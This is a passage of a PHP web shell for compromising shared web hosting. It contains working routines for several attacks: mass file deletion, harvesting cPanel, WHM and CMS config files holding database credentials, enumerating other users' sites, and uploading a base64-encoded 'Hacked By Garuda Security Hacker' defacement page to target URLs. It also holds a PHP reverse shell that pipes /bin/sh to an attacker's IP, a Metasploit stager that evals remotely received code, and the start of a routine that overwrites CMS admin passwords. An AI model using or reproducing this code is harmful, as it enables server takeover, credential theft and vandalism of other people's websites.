  1397.                 } elseif($dirb === '..') {
  1398.                     if(file_exists("".dirname($dir)."/$namafile")) {
  1399.                         unlink("".dirname($dir)."/$namafile");
  1400.                     }
  1401.                 } else {
  1402.                     if(is_dir($dirc)) {
  1403.                         if(is_writable($dirc)) {
  1404.                             if(file_exists($lokasi)) {
  1405.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  1406.                                 unlink($lokasi);
  1407.                                 $idx = hapus_massal($dirc,$namafile);
  1408.                             }
  1409.                         }
  1410.                     }
  1411.                 }
  1412.             }
  1413.         }
  1414.     }
  1415.     if($_POST['start']) {
  1416.         echo "<div style='margin: 5px auto; padding: 5px'>";
  1417.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
  1418.         echo "</div>";
  1419.     } else {
  1420.     echo "<center>";
  1421.     echo "<form method='post'>
  1422.     <font style='text-decoration: underline;'>Folder:</font><br>
  1423.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1424.     <font style='text-decoration: underline;'>Filename:</font><br>
  1425.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  1426.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  1427.     </form></center>";
  1428.     }
  1429. } elseif($_GET['do'] == 'config') {
  1430.     $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  1431.     $idx = mkdir("idx_config", 0777);
  1432.     $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1433.     $htc = fopen("idx_config/.htaccess","w");
  1434.     fwrite($htc, $isi_htc);
  1435.     while($passwd = fgets($etc)) {
  1436.         if($passwd == "" || !$etc) {
  1437.             echo "<font color=red>Can't read /etc/passwd</font>";
  1438.         } else {
  1439.             preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1440.             foreach($user_config[1] as $user_idx) {
  1441.                 $user_config_dir = "/home/$user_idx/public_html/";
  1442.                 if(is_readable($user_config_dir)) {
  1443.                     $grab_config = array(
  1444.                         "/home/$user_idx/.my.cnf" => "cpanel",
  1445.                         "/home/$user_idx/.accesshash" => "WHM-accesshash",
  1446.                         "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
  1447.                         "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  1448.                         "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  1449.                         "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  1450.                         "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  1451.                         "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  1452.                         "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  1453.                         "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  1454.                         "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  1455.                         "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  1456.                         "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  1457.                         "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  1458.                         "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  1459.                         "/home/$user_idx/public_html/configuration.php" => "Joomla",
  1460.                         "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  1461.                         "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  1462.                         "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  1463.                         "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  1464.                         "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  1465.                         "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  1466.                     foreach($grab_config as $config => $nama_config) {
  1467.                         $ambil_config = file_get_contents($config);
  1468.                         if($ambil_config == '') {
  1469.                         } else {
  1470.                             $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  1471.                             fputs($file_config,$ambil_config);
  1472.                         }
  1473.                     }
  1474.                 }      
  1475.             }
  1476.         }  
  1477.     }
  1478.     echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
  1479. } elseif($_GET['do'] == 'jumping') {
  1480.     $i = 0;
  1481.     echo "<div class='margin: 5px auto;'>";
  1482.     if(preg_match("/hsphere/", $dir)) {
  1483.         $urls = explode("\r\n", $_POST['url']);
  1484.         if(isset($_POST['jump'])) {
  1485.             echo "<pre>";
  1486.             foreach($urls as $url) {
  1487.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  1488.                 $etc = "/etc/passwd";
  1489.                 $f = fopen($etc,"r");
  1490.                 while($gets = fgets($f)) {
  1491.                     $pecah = explode(":", $gets);
  1492.                     $user = $pecah[0];
  1493.                     $dir_user = "/hsphere/local/home/$user";
  1494.                     if(is_dir($dir_user) === true) {
  1495.                         $url_user = $dir_user."/".$url;
  1496.                         if(is_readable($url_user)) {
  1497.                             $i++;
  1498.                             $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1499.                             if(is_writable($url_user)) {
  1500.                                 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1501.                             }
  1502.                             echo $jrw."<br>";
  1503.                         }
  1504.                     }
  1505.                 }
  1506.             }
  1507.         if($i == 0) {
  1508.         } else {
  1509.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1510.         }
  1511.         echo "</pre>";
  1512.         } else {
  1513.             echo '<center>
  1514.                   <form method="post">
  1515.                   List Domains: <br>
  1516.                   <textarea name="url" style="width: 500px; height: 250px;">';
  1517.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1518.             while($getss = fgets($fp)) {
  1519.                 echo $getss;
  1520.             }
  1521.             echo  '</textarea><br>
  1522.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1523.                   </form></center>';
  1524.         }
  1525.     } elseif(preg_match("/vhosts/", $dir)) {
  1526.         $urls = explode("\r\n", $_POST['url']);
  1527.         if(isset($_POST['jump'])) {
  1528.             echo "<pre>";
  1529.             foreach($urls as $url) {
  1530.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  1531.                 if(is_dir($web_vh) === true) {
  1532.                     if(is_readable($web_vh)) {
  1533.                         $i++;
  1534.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1535.                         if(is_writable($web_vh)) {
  1536.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1537.                         }
  1538.                         echo $jrw."<br>";
  1539.                     }
  1540.                 }
  1541.             }
  1542.         if($i == 0) {
  1543.         } else {
  1544.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1545.         }
  1546.         echo "</pre>";
  1547.         } else {
  1548.             echo '<center>
  1549.                   <form method="post">
  1550.                   List Domains: <br>
  1551.                   <textarea name="url" style="width: 500px; height: 250px;">';
  1552.                   bing("ip:$ip");
  1553.             echo  '</textarea><br>
  1554.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1555.                   </form></center>';
  1556.         }
  1557.     } else {
  1558.         echo "<pre>";
  1559.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1560.         while($passwd = fgets($etc)) {
  1561.             if($passwd == '' || !$etc) {
  1562.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1563.             } else {
  1564.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1565.                 foreach($user_jumping[1] as $user_idx_jump) {
  1566.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1567.                     if(is_readable($user_jumping_dir)) {
  1568.                         $i++;
  1569.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1570.                         if(is_writable($user_jumping_dir)) {
  1571.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1572.                         }
  1573.                         echo $jrw;
  1574.                         if(function_exists('posix_getpwuid')) {
  1575.                             $domain_jump = file_get_contents("/etc/named.conf");   
  1576.                             if($domain_jump == '') {
  1577.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1578.                             } else {
  1579.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1580.                                 foreach($domains_jump[1] as $dj) {
  1581.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1582.                                     $user_jumping_url = $user_jumping_url['name'];
  1583.                                     if($user_jumping_url == $user_idx_jump) {
  1584.                                         echo " => ( <u>$dj</u> )<br>";
  1585.                                         break;
  1586.                                     }
  1587.                                 }
  1588.                             }
  1589.                         } else {
  1590.                             echo "<br>";
  1591.                         }
  1592.                     }
  1593.                 }
  1594.             }
  1595.         }
  1596.         if($i == 0) {
  1597.         } else {
  1598.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1599.         }
  1600.         echo "</pre>";
  1601.     }
  1602.     echo "</div>";
  1603. } elseif($_GET['do'] == 'autoklik') {
  1604. ?>
  1605. <form method="post">
  1606. <input type="submit" name="x" value="index.php">
  1607. </form>
  1608. <?php
  1609. $target = explode("\r\n", $_POST['target']);
  1610. if($_POST['x']) {
  1611.     foreach($target as $korban) {
  1612.         $global = "index.php";
  1613.         $isi_nama_doang = "PHRpdGxlPkxvY2tlZDwvdGl0bGU+DQo8c3R5bGU+DQpib2R5ew0KdGV4dC1zaGFkb3c6MnB4IDJweCAxcHggYmx1ZTsNCn0NCmh0bWwgew0KCSBiYWNrZ3JvdW5kOiB1cmwoaHR0cHM6Ly9zY29udGVudC1zaW42LTEueHguZmJjZG4ubmV0L3YvdDEuMC0wL3M1NTJ4NDE0LzE1OTY1NTMxXzE5MTc4Nzg2MDUxMDY2MzNfODE4MDM5MjkyMzE4MzIyMzcxMF9uLmpwZz9vaD1kZDUwNGM1YTEyODU3MzFiMTQ0MDg0YWUzZGVkZDkyMSZvZT01OTExOEI2OSkgbm8tcmVwZWF0IGNlbnRlciBjZW50ZXIgZml4ZWQ7IA0KICAtd2Via2l0LWJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogIC1tb3otYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgLW8tYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgICBjb2xvcjogI2ZmZmZmZjsNCiAgICBmb250LWZhbWlseTogJ1VidW50dSc7DQoJZm9udC1zaXplOiAxM3B4Ow0KCXdpZHRoOiAxMDAlOw0KfQ0KPC9zdHlsZT4NCjxjZW50ZXI+PGZvbnQgY29sb3I9InJlZCI+PHN0cm9uZz48Zm9udCBzaXplPSI0Ij5IYWNrZWQgQnkgR2FydWRhIFNlY3VyaXR5IEhhY2tlcjwvZm9udD48L3N0cm9uZz48L2ZvbnQ+PGNlbnRlcj4NCjxzY3JpcHQ+dmFyIGc9NTAsZj1uZXcgQXJyYXkoIiNBQUFBQ0MiLCIjREREREZGIiwiI0NDQ0NERCIsIiNGM0YzRjMiLCIjRjBGRkZGIiksZT1uZXcgQXJyYXkoIkFyaWFsIEJsYWNrIiwiQXJpYWwgTmFycm93IiwiVGltZXMiLCJDb21pYyBTYW5zIE1TIiksZD0iKiIsbT0wLjYsYT0yMixiPTgsYz0xLGo9bmV3IEFycmF5KCksayxsLHgsbj1uZXcgQXJyYXkoKSxvPW5ldyBBcnJheSgpLHA9bmV3IEFycmF5KCkscT1uYXZpZ2F0b3IudXNlckFnZW50LHI9ZG9jdW1lbnQuYWxsJiZkb2N1bWVudC5nZXRFbGVtZW50QnlJZCYmIXEubWF0Y2goL09wZXJhLykscz1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCYmIWRvY3VtZW50LmFsbCx1PXEubWF0Y2goL09wZXJhLyksdD1yfHxzfHx1O2Z1bmN0aW9uIHkoeil7cmV0dXJuIE1hdGguZmxvb3IoeipNYXRoLnJhbmRvbSgpKX1mdW5jdGlvbiB2KCl7aWYocnx8dSl7az1kb2N1bWVudC5ib2R5LmNsaWVudEhlaWdodDtsPWRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGg7fWVsc2UgaWYocyl7az13aW5kb3cuaW5uZXJIZWlnaHQ7bD13aW5kb3cuaW5uZXJXaWR0aDt9dmFyIGg9YS1iO2ZvcihpPTA7aTw9ZztpKyspe29baV09MDtwW2ldPU1hdGgucmFuZG9tKCkqMTU7bltpXT0wLjAzK01hdGgucmFuZG9tKCkvMTA7altpXT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgicyIraSk7altpXS5zdHlsZS5mb250RmFtaWx5PWVbeShlLmxlbmd0aCldO2pbaV0uc2l6ZT15KGgpK2I7altpXS5zdHlsZS5mb250U2l6ZT1qW2ldLnNpemU7altpXS5zdHlsZS5jb2xvcj1mW3koZi5sZW5ndGgpXTtqW2ldLnNpbms9bSpqW2ldLnNpemUvNTtpZihjPT0xKXtqW2ldLnBvc3g9eShsLWpbaV0uc2l6ZSl9aWYoYz09Mil7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSl9aWYoYz09Myl7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSkrbC80fTtpZihjPT00KXtqW2ldLnBvc3g9eShsLzItaltpXS5zaXplKStsLzJ9altpXS5wb3N5PXkoMiprLWstMipqW2ldLnNpemUpO2pbaV0uc3R5bGUubGVmdD1qW2ldLnBvc3g7altpXS5zdHlsZS50b3A9altpXS5wb3N5fXcoKX1mdW5jdGlvbiB3KCl7Zm9yKGk9MDtpPD1nO2krKyl7b1tpXSs9bltpXTtqW2ldLnBvc3krPWpbaV0uc2luaztqW2ldLnN0eWxlLmxlZnQ9altpXS5wb3N4K3BbaV0qTWF0aC5zaW4ob1tpXSk7altpXS5zdHlsZS50b3A9altpXS5wb3N5O2lmKGpbaV0ucG9zeT49ay0yKmpbaV0uc2l6ZXx8cGFyc2VJbnQoaltpXS5zdHlsZS5sZWZ0KT4obC0zKnBbaV0pKXtpZihjPT0xKXtqW2ldLnBvc3g9eShsLWpbaV0uc2l6ZSl9aWYoYz09Mil7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSl9aWYoYz09Myl7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSkrbC80fWlmKGM9PTQpe2pbaV0ucG9zeD15KGwvMi1qW2ldLnNpemUpK2wvMn1qW2ldLnBvc3k9MH19dmFyIHg9c2V0VGltZW91dCgidygpIiw1MCl9Zm9yKGk9MDtpPD1nO2krKyl7ZG9jdW1lbnQud3JpdGUoIjxzcGFuIGlkPSdzIitpKyInIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTt0b3A6LSIrYSsiJz4iK2QrIjwvc3Bhbj4iKX1pZih0KXt3aW5kb3cub25sb2FkPXZ9PC9zY3JpcHQ+PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7bGVmdDozNiU7dG9wOjQ2JSI+PC9kaXY+PHN0eWxlPjwvdGV4dGFyZWE+PGJyPjwvc3R5bGU+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj4NCjxmb250IHNpemU9IjYiPjxjZW50ZXI+X1R1YW4yRmF5XyAtIFl1a2lub3NoaXRhIDQ3IC0gVE1fNDA0IDxicj4gU25vb3plIC0gTHlvbmMgLSBFN0JfNDA0IC0gRGFya1RlcnJvcml6dCA8YnI+IC4vWmVybypBbmdlbCAtIDVpTk9OIU1PVTIzIC0gTXIuWE00MDRSUyEgLSAuL1IxNV9VVEQgLSBFdmlsQ2xvd24gPGJyPiB1dHJhZ2VvdXNFbmdrdXMgLSAzNERfU0wzM1AgLSBTZWN0b3IgVi4yIC0gTXIuU3BvbmdlYm9iIDxicj5TaGFkb3dIZSpydCAtIEN5YmVyR2hvc3QuMTcgLSBBbmQgQWxsIE1lbWJlciBvZiBHYXJ1ZGEgU2VjdXJpdHkgSGFja2Vy";
  1614.         $decode_isi = base64_decode($isi_nama_doang);
  1615.         $encode = base64_encode($global);
  1616.         $ss = fopen($global,"w");
  1617.         fputs($ss, $decode_isi);
  1618.         echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
  1619.         echo "Done index.php<br>";
  1620.         $url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw";
  1621.         $post1 = array(
  1622.                 "target" => "l1_$encode",
  1623.                 "content" => "$decode_isi",);
  1624.         $post2 = array( "upload[]" => "@$global",);
  1625.         $output_mkfile = ngirim("$korban", $post1);
  1626.             $upload_ah = ngirim("$korban?cmd=upload", $post2);
  1627.             }
  1628.         }
  1629. ?>
  1630. <form method="post">
  1631. <input type="submit" name="s" value="lol.php">
  1632. </form>
  1633. <?php
  1634. $targets = explode("\r\n", $_POST['targets']);
  1635. if($_POST['s']) {
  1636.     foreach($targets as $korba) {
  1637.         $globa = "lol.php";
  1638.         $isi_nama = "PHRpdGxlPkxvY2tlZDwvdGl0bGU+DQo8c3R5bGU+DQpib2R5ew0KdGV4dC1zaGFkb3c6MnB4IDJweCAxcHggYmx1ZTsNCn0NCmh0bWwgew0KCSBiYWNrZ3JvdW5kOiB1cmwoaHR0cHM6Ly9zY29udGVudC1zaW42LTEueHguZmJjZG4ubmV0L3YvdDEuMC0wL3M1NTJ4NDE0LzE1OTY1NTMxXzE5MTc4Nzg2MDUxMDY2MzNfODE4MDM5MjkyMzE4MzIyMzcxMF9uLmpwZz9vaD1kZDUwNGM1YTEyODU3MzFiMTQ0MDg0YWUzZGVkZDkyMSZvZT01OTExOEI2OSkgbm8tcmVwZWF0IGNlbnRlciBjZW50ZXIgZml4ZWQ7IA0KICAtd2Via2l0LWJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogIC1tb3otYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgLW8tYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsNCiAgICBjb2xvcjogI2ZmZmZmZjsNCiAgICBmb250LWZhbWlseTogJ1VidW50dSc7DQoJZm9udC1zaXplOiAxM3B4Ow0KCXdpZHRoOiAxMDAlOw0KfQ0KPC9zdHlsZT4NCjxjZW50ZXI+PGZvbnQgY29sb3I9InJlZCI+PHN0cm9uZz48Zm9udCBzaXplPSI0Ij5IYWNrZWQgQnkgR2FydWRhIFNlY3VyaXR5IEhhY2tlcjwvZm9udD48L3N0cm9uZz48L2ZvbnQ+PGNlbnRlcj4NCjxzY3JpcHQ+dmFyIGc9NTAsZj1uZXcgQXJyYXkoIiNBQUFBQ0MiLCIjREREREZGIiwiI0NDQ0NERCIsIiNGM0YzRjMiLCIjRjBGRkZGIiksZT1uZXcgQXJyYXkoIkFyaWFsIEJsYWNrIiwiQXJpYWwgTmFycm93IiwiVGltZXMiLCJDb21pYyBTYW5zIE1TIiksZD0iKiIsbT0wLjYsYT0yMixiPTgsYz0xLGo9bmV3IEFycmF5KCksayxsLHgsbj1uZXcgQXJyYXkoKSxvPW5ldyBBcnJheSgpLHA9bmV3IEFycmF5KCkscT1uYXZpZ2F0b3IudXNlckFnZW50LHI9ZG9jdW1lbnQuYWxsJiZkb2N1bWVudC5nZXRFbGVtZW50QnlJZCYmIXEubWF0Y2goL09wZXJhLykscz1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCYmIWRvY3VtZW50LmFsbCx1PXEubWF0Y2goL09wZXJhLyksdD1yfHxzfHx1O2Z1bmN0aW9uIHkoeil7cmV0dXJuIE1hdGguZmxvb3IoeipNYXRoLnJhbmRvbSgpKX1mdW5jdGlvbiB2KCl7aWYocnx8dSl7az1kb2N1bWVudC5ib2R5LmNsaWVudEhlaWdodDtsPWRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGg7fWVsc2UgaWYocyl7az13aW5kb3cuaW5uZXJIZWlnaHQ7bD13aW5kb3cuaW5uZXJXaWR0aDt9dmFyIGg9YS1iO2ZvcihpPTA7aTw9ZztpKyspe29baV09MDtwW2ldPU1hdGgucmFuZG9tKCkqMTU7bltpXT0wLjAzK01hdGgucmFuZG9tKCkvMTA7altpXT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgicyIraSk7altpXS5zdHlsZS5mb250RmFtaWx5PWVbeShlLmxlbmd0aCldO2pbaV0uc2l6ZT15KGgpK2I7altpXS5zdHlsZS5mb250U2l6ZT1qW2ldLnNpemU7altpXS5zdHlsZS5jb2xvcj1mW3koZi5sZW5ndGgpXTtqW2ldLnNpbms9bSpqW2ldLnNpemUvNTtpZihjPT0xKXtqW2ldLnBvc3g9eShsLWpbaV0uc2l6ZSl9aWYoYz09Mil7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSl9aWYoYz09Myl7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSkrbC80fTtpZihjPT00KXtqW2ldLnBvc3g9eShsLzItaltpXS5zaXplKStsLzJ9altpXS5wb3N5PXkoMiprLWstMipqW2ldLnNpemUpO2pbaV0uc3R5bGUubGVmdD1qW2ldLnBvc3g7altpXS5zdHlsZS50b3A9altpXS5wb3N5fXcoKX1mdW5jdGlvbiB3KCl7Zm9yKGk9MDtpPD1nO2krKyl7b1tpXSs9bltpXTtqW2ldLnBvc3krPWpbaV0uc2luaztqW2ldLnN0eWxlLmxlZnQ9altpXS5wb3N4K3BbaV0qTWF0aC5zaW4ob1tpXSk7altpXS5zdHlsZS50b3A9altpXS5wb3N5O2lmKGpbaV0ucG9zeT49ay0yKmpbaV0uc2l6ZXx8cGFyc2VJbnQoaltpXS5zdHlsZS5sZWZ0KT4obC0zKnBbaV0pKXtpZihjPT0xKXtqW2ldLnBvc3g9eShsLWpbaV0uc2l6ZSl9aWYoYz09Mil7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSl9aWYoYz09Myl7altpXS5wb3N4PXkobC8yLWpbaV0uc2l6ZSkrbC80fWlmKGM9PTQpe2pbaV0ucG9zeD15KGwvMi1qW2ldLnNpemUpK2wvMn1qW2ldLnBvc3k9MH19dmFyIHg9c2V0VGltZW91dCgidygpIiw1MCl9Zm9yKGk9MDtpPD1nO2krKyl7ZG9jdW1lbnQud3JpdGUoIjxzcGFuIGlkPSdzIitpKyInIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTt0b3A6LSIrYSsiJz4iK2QrIjwvc3Bhbj4iKX1pZih0KXt3aW5kb3cub25sb2FkPXZ9PC9zY3JpcHQ+PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7bGVmdDozNiU7dG9wOjQ2JSI+PC9kaXY+PHN0eWxlPjwvdGV4dGFyZWE+PGJyPjwvc3R5bGU+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj4NCjxmb250IHNpemU9IjYiPjxjZW50ZXI+X1R1YW4yRmF5XyAtIFl1a2lub3NoaXRhIDQ3IC0gVE1fNDA0IDxicj4gU25vb3plIC0gTHlvbmMgLSBFN0JfNDA0IC0gRGFya1RlcnJvcml6dCA8YnI+IC4vWmVybypBbmdlbCAtIDVpTk9OIU1PVTIzIC0gTXIuWE00MDRSUyEgLSAuL1IxNV9VVEQgLSBFdmlsQ2xvd24gPGJyPiB1dHJhZ2VvdXNFbmdrdXMgLSAzNERfU0wzM1AgLSBTZWN0b3IgVi4yIC0gTXIuU3BvbmdlYm9iIDxicj5TaGFkb3dIZSpydCAtIEN5YmVyR2hvc3QuMTcgLSBBbmQgQWxsIE1lbWJlciBvZiBHYXJ1ZGEgU2VjdXJpdHkgSGFja2Vy";
  1639.         $decode_isi = base64_decode($isi_nama);
  1640.         $encode = base64_encode($globa);
  1641.         $ss = fopen($globa,"w");
  1642.         fputs($ss, $decode_isi);
  1643.         echo "[+] <a href='$korban' targets='_blank'>$korba</a> <br>";
  1644.         echo "Done lol.php<br>";
  1645.         $url_mkfil = "$korba?cmd=mkfile&name=$globa&targets=l1_Lw";
  1646.         $post1 = array(
  1647.                 "targets" => "l1_$encode",
  1648.                 "content" => "$decode_isi",);
  1649.         $post2 = array( "upload[]" => "@$globa",);
  1650.         $output_mkfil = ngirim("$korban", $post1);
  1651.             $upload_as = ngirim("$korban?cmd=upload", $post2);
  1652.             }
  1653.         }
  1654.  
  1655. } elseif($_GET['do'] == 'tool') {
  1656. error_reporting(0);
  1657. function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));}
  1658. $s_my_ip = gethostbyname($_SERVER['HTTP_HOST']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?y=<?php echo $pwd;?>&amp;x='tool'><table class='tabnet'><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='".$rstarget4."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='".$rsportb4."' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='".$pwd."' /></form></td><td><hr color='#4C83AF'><td><td><form method='POST'><table class='tabnet'><h2>Metasploit Connection </h2><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='".$my_ip."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center></table><br><br />";
  1659. echo $s_result;
  1660. if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}
  1661. if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']);
  1662. if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']);
  1663. if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork();
  1664. if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;}
  1665. umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);
  1666. $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
  1667. $process = proc_open($shell, $descriptorspec, $pipes);
  1668. if(!is_resource($process)) exit(1);
  1669. stream_set_blocking($pipes[0], 0);
  1670. stream_set_blocking($pipes[1], 0);
  1671. stream_set_blocking($pipes[2], 0);
  1672. stream_set_blocking($sock, 0);
  1673. while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  1674. if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}
  1675. if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}
  1676. if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}
  1677. } elseif($_GET['do'] == 'auto_edit_user') {
  1678.     if($_POST['hajar']) {
  1679.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1680.             echo "username atau password harus lebih dari 6 karakter";
  1681.         } else {
  1682.             $user_baru = $_POST['user_baru'];
  1683.             $pass_baru = md5($_POST['pass_baru']);
  1684.             $conf = $_POST['config_dir'];
  1685.             $scan_conf = scandir($conf);
  1686.             foreach($scan_conf as $file_conf) {
  1687.                 if(!is_file("$conf/$file_conf")) continue;
  1688.                 $config = file_get_contents("$conf/$file_conf");
  1689.                 if(preg_match("/JConfig|joomla/",$config)) {
  1690.                     $dbhost = ambilkata($config,"host = '","'");
  1691.                     $dbuser = ambilkata($config,"user = '","'");
